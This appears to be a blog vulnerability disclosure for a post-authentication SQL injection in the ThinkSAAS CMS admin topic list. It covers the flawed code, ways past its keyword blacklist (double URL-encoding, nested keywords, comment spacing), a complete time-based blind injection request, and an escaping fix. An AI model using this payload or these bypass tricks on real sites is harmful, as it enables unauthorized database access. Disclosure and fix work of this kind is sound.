Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

1. Intro

of this CMS

The repo of ThinksaasS is located at https://github.com/thinksaas/ThinkSAAS , quite a common-used CMS.

Source code of v3.38 could be downloaded at https://www.thinksaas.cn/service/down/ , while passcode of downlaoding is thinksaas9999


of this Vuln

ThinkSAAS before 3.38 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter, allowing remote attackers to execute arbitrary SQL commands.

2. Walkthrough

Code Review

Risky lines are here =>

Due to unproper conjunction of SQL query sentences (1) and invalid filter (2)

(1) unproper conjunction of SQL query sentences

app/topic/action/admin/topic.php#L42



Let's see how findAll() works:

thinksaas/tsApp.php#L146

正在上传:已上传 51875 字节(共 51875 字节)。


Till now, $where is partly controlled by us, once injecting a singal quote ' via $title, while how to closen this query sentence is still unknown, cause the filtering of   # and --

However, the function of  urldecode() helped us, we can craft a double-URLencoded params, like %25%23 >>> %23 >>> # , ( namely %2523 stands for # )  , as it will BYPASS the filter (#) as follows.  

So we have a vuln of SQLi. Let's see the sanitizing functions.

(2) invalid filter

This CMS have some global functions for sanitizing user-controlled params, in /thinksaas/tsFunction.php#2134 , as its link goes here

function tsFilter($value) {

    $value = trim($value);

    //定义不允许提交的SQl命令和关键字

    $words = array();

    $words[] = "add ";

    $words[] = "and ";

    $words[] = "count ";

    $words[] = "order ";

    $words[] = "table ";

    $words[] = "by ";

    $words[] = "create ";

    $words[] = "delete ";

    $words[] = "drop ";

    $words[] = "from ";

    $words[] = "grant ";

    $words[] = "insert ";

    $words[] = "select ";

    $words[] = "truncate ";

    $words[] = "update ";

    $words[] = "use ";

    $words[] = "--";

    $words[] = "#";

    $words[] = "group_concat";

    $words[] = "column_name";

    $words[] = "information_schema.columns";

    $words[] = "table_schema";

    $words[] = "union ";

    $words[] = "where ";

    $words[] = "alert";

    $value = strtolower($value);

    //转换为小写

    foreach ($words as $word) {

        if (strstr($value, $word)) {

            $value = str_replace($word, '', $value);

        }

    }

 

    return $value;

}

Apart from that foreach ($words as $word) { cannot comletely sanitize those evil words, the Blacklists itself is invalid as well. While SELselect ECT 1  could still be used ( as SELselect ECT 1 => SELECT 1 ).

Also, one is abe to use select/**/1 instead of select 1 , in order to bypass the blackword of select .

As above, select/**/1/**/from/**/(sleep(1) could be used.

In summary, we can craft a special payload ( double-URLencoded + SQL injection ) to trigger SQLi vulns, of course we need login first...

PoC & EXPLOIT

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1

Host: thinksaas

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword

Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8

Upgrade-Insecure-Requests: 1

 


3. Mitigations

After URLdecode , param sanitizing may still be neccessary, a possible demo is as follows:

if($title){

            //$where = "`title` like '%$title%'";      

            $where = "`title` like '%". $this->escape($title). "%'";

        }


评论

  1. 你好,是否是系统管理员登录的情况下?

    回复删除
    回复
    1. 是的, 是在系统管理员登录的情况下。Yes, it's a Post-Auth SQL Injection

      删除

发表评论

此博客中的热门博文

lykops has multiple vulnerabilities

MKCMS V6.2 has mutilple vulnerabilities